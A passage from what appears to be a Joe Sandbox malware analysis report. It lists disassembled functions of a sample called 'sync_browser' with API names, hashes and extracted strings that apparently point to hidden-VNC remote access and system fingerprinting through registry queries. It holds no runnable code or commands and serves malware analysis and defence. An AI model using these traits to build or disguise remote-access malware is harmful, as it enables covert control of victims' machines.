                                                                                            • Part of subcall function 00007FF67E8832EC: Sleep.KERNEL32(?,?,?,00007FF67E8837F7,?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19), ref: 00007FF67E883331
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E883808
                                                                                          • free.LIBCMT ref: 00007FF67E88382B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00007FF67E88381C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                          • String ID:
                                                                                          • API String ID: 3106088686-0
                                                                                          • Opcode ID: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                                          • Instruction ID: 0167d0ae6f07beaba3a49b5569d4c0ae0c75446cd5582df54611cb8d817b5d9e
                                                                                          • Opcode Fuzzy Hash: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                                          • Instruction Fuzzy Hash: 4A017126E2974386FA05AF69E444038A295AF68790F084234ED1E873D1EF3CE44DC610
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                                          • String ID:
                                                                                          • API String ID: 2426525106-0
                                                                                          • Opcode ID: d1e3790ca69d27bde17f614978f7e119cb29ace29c054124991cbde3621388be
                                                                                          • Instruction ID: 1edd40bb184054df1b3b83796a582406922f4d142a09dc719288d3976daa8982
                                                                                          • Opcode Fuzzy Hash: d1e3790ca69d27bde17f614978f7e119cb29ace29c054124991cbde3621388be
                                                                                          • Instruction Fuzzy Hash: 31011233B69A4196DA44DB56E990178B334FF98B90B444031EA5D877A1CF3DE879C300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                                          • String ID:
                                                                                          • API String ID: 2426525106-0
                                                                                          • Opcode ID: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
                                                                                          • Instruction ID: 067a2f3c9c5081f633343f9362482fe90c7505b05ff7ed3e52d74936536d533f
                                                                                          • Opcode Fuzzy Hash: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
                                                                                          • Instruction Fuzzy Hash: 7BF0D463A65A4185EB40EF65D851068B338FFA8F94B404031EA5D873A5CF3DD89AC300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                                          • String ID:
                                                                                          • API String ID: 2426525106-0
                                                                                          • Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                                                          • Instruction ID: 067a2f3c9c5081f633343f9362482fe90c7505b05ff7ed3e52d74936536d533f
                                                                                          • Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                                                          • Instruction Fuzzy Hash: 7BF0D463A65A4185EB40EF65D851068B338FFA8F94B404031EA5D873A5CF3DD89AC300
                                                                                          APIs
                                                                                          Strings
                                                                                          • vncclient.cpp : Compress returned error in File Send :%d, xrefs: 00007FF67E7EBA26
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$EnterFileRead
                                                                                          • String ID: vncclient.cpp : Compress returned error in File Send :%d
                                                                                          • API String ID: 3826087893-1161645139
                                                                                          • Opcode ID: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                                                          • Instruction ID: f7ea6d059380bbf84f0d572e1d374a779b86764191e55f2d1735c69261252e71
                                                                                          • Opcode Fuzzy Hash: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                                                          • Instruction Fuzzy Hash: 7BB18F33A28A4289E7648F25C8403FD3BA1EB54B58F140236EE5D9B6D9CE3CE459C754
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: EnumDisplayDevicesA$USER32
                                                                                          • API String ID: 145871493-2970514552
                                                                                          • Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                                          • Instruction ID: 1dff644a9d4b241edd53ff01a15d20023988e3c4b1ca4eeba7242597ff4d8ad9
                                                                                          • Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                                          • Instruction Fuzzy Hash: 3631C733B28B4285EA60DF95E4446A9E2A4FBA6790F540139EEAD83794DF3DD809C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: EnumDisplayDevicesA$USER32
                                                                                          • API String ID: 145871493-2970514552
                                                                                          • Opcode ID: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
                                                                                          • Instruction ID: ed6f3bf171095db405e6d0f17b0d15a6389b117c7ea57d6876c8546c5f3c4b7c
                                                                                          • Opcode Fuzzy Hash: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
                                                                                          • Instruction Fuzzy Hash: 9531EC33B28B8145E760CF55E5446A5B7A0FBAAB94F540238EEAD83794DF3DD909C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: CSDVersion$Software\Microsoft\Windows NT\CurrentVersion
                                                                                          • API String ID: 3677997916-605553437
                                                                                          • Opcode ID: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
                                                                                          • Instruction ID: 6acfeb823dbc7c1b2f7b0bf04598bb9b49af2ba718f67ac10b8e6847eb2a22b7
                                                                                          • Opcode Fuzzy Hash: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
                                                                                          • Instruction Fuzzy Hash: EB31BB23B2968285EB708B54F48077AB7A8FB65754F405332F69E879E4DF2DE458C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: EnumDisplayDevicesA$USER32
                                                                                          • API String ID: 145871493-2970514552
                                                                                          • Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                                          • Instruction ID: bbb42484326ad306a161069593e5d5484ed02ac0f53bee96b2b5148258d4c928
                                                                                          • Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                                          • Instruction Fuzzy Hash: 8C21A533B28B4146E760DF55E4446A9A3A4FBA9790F550239EEAE83784DF3DD80A8700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SubVersionNumber
                                                                                          • API String ID: 3677997916-1834015684
                                                                                          • Opcode ID: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                                          • Instruction ID: d3d6752903a170d5ccb83e847635991d7101c983cb578e25acec093d4cd1448a
                                                                                          • Opcode Fuzzy Hash: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                                          • Instruction Fuzzy Hash: CD213762A28B8281FB608B14E444766B3A8FFA4758F445235FA4D476A8EF3CD089C704
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
                                                                                          • String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
                                                                                          • API String ID: 3848869850-2975526927
                                                                                          • Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                                          • Instruction ID: 7120c6e407c30ba9eb58d1673f2e118124b65a869e0ad9e9356b2d48e7187928
                                                                                          • Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                                          • Instruction Fuzzy Hash: FA112A67F3954381FA509B24E8146B56369AFB4309F404532F41EE66B6DE3CA60DC741
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileWrite$SectionStringwsprintf
                                                                                          • String ID: Permissions$isWritable
                                                                                          • API String ID: 4007284473-46173998
                                                                                          • Opcode ID: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                                          • Instruction ID: 762d209c296fb580205cbcabe3406ea56b7dbb335b93664386e1d0a466e386ea
                                                                                          • Opcode Fuzzy Hash: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                                          • Instruction Fuzzy Hash: EE017C66F28A4792FA208B11F8511B5B324FFA9B58F841132F91D862A1EE2DE18DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: Installed$System\WPA\MediaCenter
                                                                                          • API String ID: 3677997916-3461404619
                                                                                          • Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                                                          • Instruction ID: 7cb7254e5d12558548dab2a36aae96b4e95d790e36c1f2a75c1e7740621972b9
                                                                                          • Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
